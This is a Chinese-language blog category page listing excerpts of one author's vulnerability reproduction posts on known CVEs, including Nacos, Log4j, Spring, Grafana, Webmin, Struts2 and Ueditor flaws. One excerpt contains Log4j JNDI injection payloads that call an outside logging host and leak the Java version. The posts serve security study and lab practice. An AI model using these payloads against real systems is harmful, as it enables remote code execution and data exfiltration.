随笔分类 -  nday

23年9月-24年6月公开漏洞整理
发表于 2024-06-05 16:00阅读:3评论:0推荐:0
该文被密码保护。
posted @ 2024-06-05 16:00 LinkPoc 阅读(3) 评论(0) 推荐(0) 编辑
Nacos未授权 CVE-2021-29441
发表于 2023-12-21 15:23阅读:224评论:0推荐:0
摘要:Nacos未授权 CVE-2021-29441 环境搭建 环境dockerfile在文末 环境启动 docker-compose up -d 查看下当前的容器 docker ps 漏洞复现 访问Web页面 127.0.0.1:8848 抓包,访问http://127.0.0.1:8848/nacos 阅读全文 »
posted @ 2023-12-21 15:23 LinkPoc 阅读(224) 评论(0) 推荐(0) 编辑
关于面试常问到的几种Java反序列化
发表于 2023-09-08 17:50阅读:394评论:0推荐:0
摘要:更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1 阅读全文 »
posted @ 2023-09-08 17:50 LinkPoc 阅读(394) 评论(0) 推荐(0) 编辑
Spring Cloud Config Server 目录遍历漏洞(CVE-2020-5410)
发表于 2022-02-15 21:43阅读:633评论:0推荐:0
摘要:Spring Cloud Config Server 目录遍历漏洞(CVE-2020-5410) 概述 较旧的不受支持的版本允许应用程序通过 spring-cloud-config-server 模块提供任意配置文件 影响范围 2.1.x<Spring Cloud Config版本 <2.2.x 目 阅读全文 »
posted @ 2022-02-15 21:43 LinkPoc 阅读(633) 评论(0) 推荐(0) 编辑
Swagger接口泄露(脱敏获取密码)
发表于 2022-02-13 12:56阅读:1803评论:1推荐:0
摘要:Swagger接口泄露(脱敏获取密码) 概述: 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 利用条件: 可正常 GET 请求目标 /heapdump 或 /actuator/he 阅读全文 »
posted @ 2022-02-13 12:56 LinkPoc 阅读(1803) 评论(1) 推荐(0) 编辑
Spring泄露(转载)
发表于 2022-01-11 15:26阅读:961评论:0推荐:0
摘要:转载 原项目地址:https://github.com/LandGrey/SpringBootVulExploit Spring Boot介绍 Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化Spring应用初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而 阅读全文 »
posted @ 2022-01-11 15:26 LinkPoc 阅读(961) 评论(0) 推荐(0) 编辑
浅谈最近闹得火热的Log4j RCE漏洞
发表于 2021-12-11 13:26阅读:3239评论:0推荐:1
摘要:####谈谈最近闹得火热的Log4j RCE漏洞 #漏洞描述 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志 阅读全文 »
posted @ 2021-12-11 13:26 LinkPoc 阅读(3239) 评论(0) 推荐(1) 编辑
Goby && Grafana未授权任意文件读取 0day
发表于 2021-12-09 12:50阅读:477评论:0推荐:0
摘要:###Grafana 未授权任意文件读取 0day 漏洞,利用Goby批量扫描 #漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的 阅读全文 »
posted @ 2021-12-09 12:50 LinkPoc 阅读(477) 评论(0) 推荐(0) 编辑
Webmin未授权远程代码执行复现
发表于 2021-10-07 15:56阅读:307评论:0推荐:0
摘要:###墨者学院的靶场 ###Webmin未经身份验证的远程代码执行 CVE-2019-15107 #漏洞描述 ###该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞 ###该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码 ###(其实这个漏洞应该是故意 阅读全文 »
posted @ 2021-10-07 15:56 LinkPoc 阅读(307) 评论(0) 推荐(0) 编辑
Apache Struts2远程代码执行复现
发表于 2021-10-07 13:19阅读:378评论:0推荐:0
摘要:###墨者学院开的靶场 ###Apache Struts2远程代码执行 S2-013 #进入环境 Struts2-013好家伙,框架直接写脸上,怕人看不出来= = 看了看源码什么的啥都没发现= = 去了解了一下这个漏洞,爬回来继续做 #漏洞介绍 ###Apache Struts 2是世界上最流行的J 阅读全文 »
posted @ 2021-10-07 13:19 LinkPoc 阅读(378) 评论(0) 推荐(0) 编辑
Docker搭建Vulhub遇见的问题及解决方案
发表于 2021-10-05 18:15阅读:1829评论:0推荐:1
摘要:原本想用docker复现一下vul的漏洞。 装docker过程中遇到了很多问题, 昨天熬夜到凌晨三点都没弄完。 中午又找了找原因,终于全部解决了, 小结一下。 #镜像 去官方下载了centos 8的镜像, https://www.centos.org/ #在vmware中安装centos系统 参考h 阅读全文 »
posted @ 2021-10-05 18:15 LinkPoc 阅读(1829) 评论(0) 推荐(1) 编辑
Ueditor 1.4.3 服务器请求伪造分析
发表于 2021-09-30 18:04阅读:2508评论:0推荐:0
摘要:###偶然挖到的一个ssrf漏洞 ###Ueditor 1.4.3版本 服务器请求伪造漏洞 #漏洞描述 UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。 在使用抓取图片的功能时,造成SSRF漏洞 阅读全文 »
posted @ 2021-09-30 18:04 LinkPoc 阅读(2508) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示